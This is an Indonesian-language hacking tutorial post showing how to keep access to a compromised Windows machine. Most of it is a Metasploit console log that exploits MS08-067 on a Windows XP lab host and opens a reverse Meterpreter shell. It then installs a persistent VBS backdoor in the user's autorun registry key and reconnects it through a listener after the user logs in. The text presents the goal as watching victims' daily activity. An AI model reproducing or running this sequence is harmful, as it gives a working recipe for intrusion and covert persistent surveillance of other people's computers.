Basic Maintaining Access

Telah dijelaskan sebelumnya tentang gaining access ke meterpreter. Seperti di sini, sini, dan di sini. Sering kali kita mendapat user yang emang terkenal cerdas, dan mengetahui kesalahan yang ada dalam komputernya, sehingga dia menutup celas-celah vulnerable dan hacker akan kesulitan masuk dengan menggunakan metode yang sama dengan yang sebelumnya.
Mengapa harus menjaga dan memelihara akses? Hal ini dimaksud untuk memantau aktifitas korban sehari-hari dan melakukan penelitian terhadap hal-hal yang dimaksud oleh hacker.
Dengan melakukan hal ini, hacker bisa masuk kapanpun meskipun cara lamanya tidak berfungsi. Meterpreter telah menyiapkan script khusus untuk melakukannya agar kita bisa berinteraksi dengan registry.
Langsung saja, setelah kita masuk ke meterpreter. Lakukan modul ini:







[CODE]
root@bt5r1:~# cd /opt/framework/msf3/
root@bt5r1:/opt/framework/msf3# ./msfconsole

                          ########                  #
                      #################            #
                   ######################         #
                  #########################      #
                ############################
               ##############################
               ###############################
              ###############################
              ##############################
                              #    ########   #
                 ##        ###        ####   ##
                                      ###   ###
                                    ####   ###
               ####          ##########   ####
               #######################   ####
                 ####################   ####
                  ##################  ####
                    ############      ##
                       ########        ###
                      #########        #####
                    ############      ######
                   ########      #########
                     #####       ########
                       ###       #########
                      ######    ############
                     #######################
                     #   #   ###  #   #   ##
                     ########################
                      ##     ##   ##     ##



       =[ metasploit v4.1.0-testing [core:4.1 api:1.0]
+ -- --=[ 747 exploits - 383 auxiliary - 92 post
+ -- --=[ 228 payloads - 27 encoders - 8 nops
       =[ svn r13985 updated 5 days ago (2011.10.18)

msf > use exploit/windows/smb/ms08_067_netapi
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(ms08_067_netapi) > set LHOST 172.16.129.1
LHOST => 172.16.129.1
msf  exploit(ms08_067_netapi) > set RHOST 172.16.129.128
RHOST => 172.16.129.128
msf  exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 172.16.129.1:4444
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (752128 bytes) to 172.16.129.128
[*] Meterpreter session 1 opened (172.16.129.1:4444 -> 172.16.129.128:1235) at 2011-10-23 12:42:13 +0700

meterpreter > run persistence -h
Meterpreter Script for creating a persistent backdoor on a target host.

OPTIONS:

    -A        Automatically start a matching multi/handler to connect to the agent
    -L <opt>  Location in target host where to write payload to, if none %TEMP% will be used.
    -P <opt>  Payload to use, default is windows/meterpreter/reverse_tcp.
    -S        Automatically start the agent on boot as a service (with SYSTEM privileges)
    -T <opt>  Alternate executable template to use
    -U        Automatically start the agent when the User logs on
    -X        Automatically start the agent when the system boots
    -h        This help menu
    -i <opt>  The interval in seconds between each connection attempt
    -p <opt>  The port on the remote host where Metasploit is listening
    -r <opt>  The IP of the system running Metasploit listening for the connect back

meterpreter > run persistence -U -i 5 -p 443 -r 172.16.129.1
[*] Running Persistance Script
[*] Resource file for cleanup created at /root/.msf4/logs/persistence/ROOT-08DA1D7B75_20111023.4439/ROOT-08DA1D7B75_20111023.4439.rc
[*] Creating Payload=windows/meterpreter/reverse_tcp LHOST=172.16.129.1 LPORT=443
[*] Persistent agent script is 609731 bytes long
[+] Persistent Script written to C:\WINDOWS\TEMP\zNIGCZocmGcl.vbs
[*] Executing script C:\WINDOWS\TEMP\zNIGCZocmGcl.vbs
[+] Agent executed with PID 3952
[*] Installing into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ZRXNwNBmgYB
[+] Installed into autorun as HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ZRXNwNBmgYB
meterpreter > reboot
Rebooting...
meterpreter > exit
[*] Shutting down Meterpreter...

[*] Meterpreter session 1 closed.  Reason: User exit
msf  exploit(ms08_067_netapi) > use exploit/multi/handler
msf  exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
PAYLOAD => windows/meterpreter/reverse_tcp
msf  exploit(handler) > set LHOST 172.16.129.1
LHOST => 172.16.129.1
msf  exploit(handler) > set LPORT 443
LPORT => 443
msf  exploit(handler) > exploit

[*] Started reverse handler on 172.16.129.1:443
[*] Starting the payload handler...

Setelah user log-in
 
[*] Sending stage (748544 bytes) to 192.168.1.161
[*] Meterpreter session 2 opened (172.16.129.1:443 -> 172.16.129.128:1235) at 2011-10-23 12:47:13 -0600
meterpreter >
[/CODE]


By Blue Dragon
Supporters, Red Dragon & Riris Rianti